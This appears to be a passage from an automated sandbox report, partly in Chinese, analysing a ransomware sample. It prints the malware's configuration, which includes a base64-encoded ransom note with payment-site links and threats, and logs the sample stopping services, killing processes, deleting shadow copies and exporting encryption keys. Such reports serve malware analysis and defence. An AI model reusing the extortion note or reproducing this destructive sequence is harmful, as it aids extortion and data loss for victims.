IABXAGgAYQB0ACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAcwAgAGoAdQBzAHQAIABhACAAYgB1AHMAaQBuAGUAcwBzAC4AIABXAGUAIABhAGIAcwBvAGwAdQB0AGUAbAB5ACAAZABvACAAbgBvAHQAIABjAGEAcgBlACAAYQBiAG8AdQB0ACAAeQBvAHUAIABhAG4AZAAgAHkAbwB1AHIAIABkAGUAYQBsAHMALAAgAGUAeABjAGUAcAB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvACAAbgBvAHQAIABkAG8AIABvAHUAcgAgAHcAbwByAGsAIABhAG4AZAAgAGwAaQBhAGIAaQBsAGkAdABpAGUAcwAgAC0AIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAuACAASQB0AHMAIABuAG8AdAAgAGkAbgAgAG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMALgANAAoAVABvACAAYwBoAGUAYwBrACAAdABoAGUAIABhAGIAaQBsAGkAdAB5ACAAbwBmACAAcgBlAHQAdQByAG4AaQBuAGcAIABmAGkAbABlAHMALAAgAFkAbwB1ACAAcwBoAG8AdQBsAGQAIABnAG8AIAB0AG8AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALgAgAFQAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAGYAIAB5AG8AdQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAG8AdQByACAAcwBlAHIAdgBpAGMAZQAgAC0AIABmAG8AcgAgAHUAcwAsACAAaQB0AHMAIABkAG8AZQBzACAAbgBvAHQAIABtAGEAdAB0AGUAcgAuACAAQgB1AHQAIAB5AG8AdQAgAHcAaQBsAGwAIABsAG8AcwBlACAAeQBvAHUAcgAgAHQAaQBtAGUAIABhAG4AZAAgAGQAYQB0AGEALAAgAGMAYQB1AHMAZQAgAGoAdQBzAHQAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkALgAgAEkAbgAgAHAAcgBhAGMAdABpAHMAZQAgAC0AIAB0AGkAbQBlACAAaQBzACAAbQB1AGMAaAAgAG0AbwByAGUAIAB2AGEAbAB1AGEAYgBsAGUAIAB0AGgAYQBuACAAbQBvAG4AZQB5AC4ADQAKAA0ACgBbACsAXQAgAEgAbwB3ACAAdABvACAAZwBlAHQAIABhAGMAYwBlAHMAcwAgAG8AbgAgAHcAZQBiAHMAaQB0AGUAPwAgAFsAKwBdAA0ACgANAAoAWQBvAHUAIABoAGEAdgBlACAAdAB3AG8AIAB3AGEAeQBzADoADQAKAA0ACgAxACkAIABbAFIAZQBjAG8AbQBtAGUAbgBkAGUAZABdACAAVQBzAGkAbgBnACAAYQAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAhAA0ACgAgACAAYQApACAARABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVABPAFIAIABiAHIAbwB3AHMAZQByACAAZgByAG8AbQAgAHQAaABpAHMAIABzAGkAdABlADoAIABoAHQAdABwAHMAOgAvAC8AdABvAHIAcAByAG8AagBlAGMAdAAuAG8AcgBnAC8ADQAKACAAIABiACkAIABPAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGEAcABsAGUAYgB6AHUANAA3AHcAZwBhAHoAYQBwAGQAcQBrAHMANgB2AHIAYwB2ADYAegBjAG4AagBwAHAAawBiAHgAYgByADYAdwBrAGUAdABmADUANgBuAGYANgBhAHEAMgBuAG0AeQBvAHkAZAAuAG8AbgBpAG8AbgAvAHsAVQBJAEQAfQANAAoADQAKADIAKQAgAEkAZgAgAFQATwBSACAAYgBsAG8AYwBrAGUAZAAgAGkAbgAgAHkAbwB1AHIAIABjAG8AdQBuAHQAcgB5ACwAIAB0AHIAeQAgAHQAbwAgAHUAcwBlACAAVgBQAE4AIQAgAEIAdQB0ACAAeQBvAHUAIABjAGEAbgAgAHUAcwBlACAAbwB1AHIAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUALgAgAEYAbwByACAAdABoAGkAcwA6AA0ACgAgACAAYQApACAATwBwAGUAbgAgAHkAbwB1AHIAIABhAG4AeQAgAGIAcgBvAHcAcwBlAHIAIAAoAEMAaAByAG8AbQBlACwAIABGAGkAcgBlAGYAbwB4ACwAIABPAHAAZQByAGEALAAgAEkARQAsACAARQBkAGcAZQApAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGQAZQBjAHIAeQBwAHQAbwByAC4AYwBjAC8AewBVAEkARAB9AA0ACgANAAoAVwBhAHIAbgBpAG4AZwA6ACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlACAAYwBhAG4AIABiAGUAIABiAGwAbwBjAGsAZQBkACwAIAB0AGgAYQB0AHMAIAB3AGgAeQAgAGYAaQByAHMAdAAgAHYAYQByAGkAYQBuAHQAIABtAHUAYwBoACAAYgBlAHQAdABlAHIAIABhAG4AZAAgAG0AbwByAGUAIABhAHYAYQBpAGwAYQBiAGwAZQAuAA0ACgANAAoAVwBoAGUAbgAgAHkAbwB1ACAAbwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQAsACAAcAB1AHQAIAB0AGgAZQAgAGYAbwBsAGwAbwB3AGkAbgBnACAAZABhAHQAYQAgAGkAbgAgAHQAaABlACAAaQBuAHAAdQB0ACAAZgBvAHIAbQA6AA0ACgBLAGUAeQA6AA0ACgANAAoAewBLAEUAWQB9AA0ACgANAAoADQAKAEUAeAB0AGUAbgBzAGkAbwBuACAAbgBhAG0AZQA6AA0ACgANAAoAewBFAFgAVAB9AA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGcAZQAgAG8AZgAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5ACAAYQBuAGQALAAgAGEAcwAgAHIAZQBzAHUAbAB0ACwAIABUAGgAZQAgAEwAbwBzAHMAIABhAGwAbAAgAGQAYQB0AGEALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAA0ACgBPAE4ARQAgAE0ATwBSAEUAIABUAEkATQBFADoAIABJAHQAcwAgAGkAbgAgAHkAbwB1AHIAIABpAG4AdABlAHIAZQBzAHQAcwAgAHQAbwAgAGcAZQB0ACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAgAGIAYQBjAGsALgAgAEYAcgBvAG0AIABvAHUAcgAgAHMAaQBkAGUALAAgAHcAZQAgACgAdABoAGUAIABiAGUAcwB0ACAAcwBwAGUAYwBpAGEAbABpAHMAdABzACkAIABtAGEAawBlACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcALAAgAGIAdQB0ACAAcABsAGUAYQBzAGUAIABzAGgAbwB1AGwAZAAgAG4AbwB0ACAAaQBuAHQAZQByAGYAZQByAGUALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAAAA","nname":"{EXT}-readme.txt","exp":false,"img":"QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA","arn":true}
console_handle: 0x00000007
success 1 0
1619861118.575698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.575698
WriteConsoleW
buffer: check RU speak..
console_handle: 0x00000007
success 1 0
1619861118.606698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.606698
WriteConsoleW
buffer: stat:{"ver":514,"pid":"$2a$10$R6jfdY.02Ns/TL60z.A74O5Dw8.5EqXA63YzUP5X2NSO0l.4y0Gfa","sub":"1428","pk":"6NQ+ixNe+LOX3eXw5ZqDBltZYJOdT/LJMQ0LQN87TTg=","uid":"70B8A33738C63B41","sk":"saT9jYHGO87peUfvHme1raKZCRdV153gfw/LZh1fzd4wL6ss+Tyz1iOXXT/WjAcghqFeGoQGfxRCJ5SgFyWn33xlnTXPME2i1w4EJi2BccOBKrFBH3VQig==","unm":"Administrator","net":"OSKAR-PC","grp":"WORKGROUP","lng":"zh-CN","bro":false,"os":"Windows 7 Ultimate","bit":64,"dsk":"QwADAAAAAPCf+QcAAAAAECKRBAAAAA==","ext":"cbf44"}
console_handle: 0x00000007
success 1 0
1619861118.622698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.637698
WriteConsoleW
buffer: check RU speak..
console_handle: 0x00000007
success 1 0
1619861118.637698
WriteConsoleW
buffer: [INF]
console_handle: 0x00000007
success 1 0
1619861118.637698
WriteConsoleW
buffer: Setting privs, try to kill svc and proc..
console_handle: 0x00000007
success 1 0
1619861118.653698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.653698
WriteConsoleW
buffer: stop service: aelookupsvc
console_handle: 0x00000007
success 1 0
1619861118.653698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.653698
WriteConsoleW
buffer: delete service: aelookupsvc
console_handle: 0x00000007
success 1 0
1619861118.669698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.669698
WriteConsoleW
buffer: stop service: cryptsvc
console_handle: 0x00000007
success 1 0
1619861118.669698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.669698
WriteConsoleW
buffer: delete service: cryptsvc
console_handle: 0x00000007
success 1 0
1619861118.684698
WriteConsoleW
buffer: [INF]
console_handle: 0x00000007
success 1 0
1619861118.684698
WriteConsoleW
buffer: Stop services ok...
console_handle: 0x00000007
success 1 0
1619861118.684698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.684698
WriteConsoleW
buffer: kill process
console_handle: 0x00000007
success 1 0
1619861118.684698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.684698
WriteConsoleW
buffer: delete shadow copy
console_handle: 0x00000007
success 1 0
1619861118.747698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861118.747698
WriteConsoleW
buffer: Connected to ROOT\CIMV2 WMI namespace
console_handle: 0x00000007
success 1 0
1619861151.856698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861151.872698
WriteConsoleW
buffer: Event occurred 0/1
console_handle: 0x00000007
success 1 0
1619861151.872698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861151.872698
WriteConsoleW
buffer: __InstanceCreationEvent
console_handle: 0x00000007
success 1 0
1619861151.887698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861151.887698
WriteConsoleW
buffer: dllhost.exe
console_handle: 0x00000007
success 1 0
1619861151.887698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861158.981698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861158.981698
WriteConsoleW
buffer: Event occurred 0/2
console_handle: 0x00000007
success 1 0
1619861158.981698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861158.997698
WriteConsoleW
buffer: __InstanceCreationEvent
console_handle: 0x00000007
success 1 0
1619861158.997698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861158.997698
WriteConsoleW
buffer: VSSVC.exe
console_handle: 0x00000007
success 1 0
1619861158.997698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861159.012698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861159.012698
WriteConsoleW
buffer: Event occurred 1/2
console_handle: 0x00000007
success 1 0
1619861159.012698
WriteConsoleW
buffer: [DBG]
console_handle: 0x00000007
success 1 0
1619861159.028698
WriteConsoleW
buffer: __InstanceCreationEvent
console_handle: 0x00000007
success 1 0
Uses Windows APIs to generate a cryptographic key (50 out of 58 个事件)
Time & API Arguments Status Return Repeated
1619867259.973398
CryptExportKey
crypto_handle: 0x00000000004b1060
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867262.879398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867262.879398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867262.879398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.286398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.286398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.301398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.317398
CryptExportKey
crypto_handle: 0x0000000000515430
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.395398
CryptExportKey
crypto_handle: 0x000000001ba8d190
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.395398
CryptExportKey
crypto_handle: 0x000000001ba8d190
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.536398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.536398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.551398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867263.551398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867264.395398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867264.411398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867264.411398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867264.629398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867264.661398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867264.723398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867265.223398
CryptExportKey
crypto_handle: 0x000000001ba8d580
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.426398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.426398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.442398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.442398
CryptExportKey
crypto_handle: 0x000000001ba8da50
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.442398
CryptExportKey
crypto_handle: 0x000000001ba8da50
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.442398
CryptExportKey
crypto_handle: 0x000000001ba8da50
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.458398
CryptExportKey
crypto_handle: 0x000000001ba8da50
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.458398
CryptExportKey
crypto_handle: 0x000000001ba8da50
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.458398
CryptExportKey
crypto_handle: 0x000000001ba8db30
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.458398
CryptExportKey
crypto_handle: 0x000000001ba8db30
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867267.458398
CryptExportKey
crypto_handle: 0x000000001ba8db30
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867268.520398
CryptExportKey
crypto_handle: 0x000000001ba8dac0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867268.520398
CryptExportKey
crypto_handle: 0x000000001ba8dac0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.223398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.223398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.223398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.645398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.676398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.708398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867270.817398
CryptExportKey
crypto_handle: 0x000000001ba8d2e0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867271.223398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867271.223398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867271.911398
CryptExportKey
crypto_handle: 0x000000001ba8deb0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867271.911398
CryptExportKey
crypto_handle: 0x000000001ba8deb0
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867271.973398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867271.989398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867272.004398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867272.208398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619867272.208398
CryptExportKey
crypto_handle: 0x000000001ba8de40
crypto_export_handle: 0x0000000000000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
This executable has a PDB path (1 个事件)
pdb_path ***************************\Debug\rwenc_exe_x86_debug.pdb
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619867240.114398
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section .sn0g5x
行为判定
动态指标
Performs some HTTP requests (4 个事件)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o76n7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619838257&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m
request GET http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=764f4618bae34018&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619838257&mv=m
Allocates read-write-execute memory (usually to unpack itself) (50 out of 192 个事件)
Time & API Arguments Status Return Repeated
1619867257.254398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x0000000002c20000
success 0 0
1619867257.254398
NtAllocateVirtualMemory
process_identifier: 2364
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000002cb0000
success 0 0
1619867257.629398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1851000
success 0 0
1619867257.817398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ace000
success 0 0
1619867257.817398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ace000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1acf000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad0000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad0000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
base_address: 0x000007fef1ad0000
success 0 0
1619867257.911398
NtProtectVirtualMemory
process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
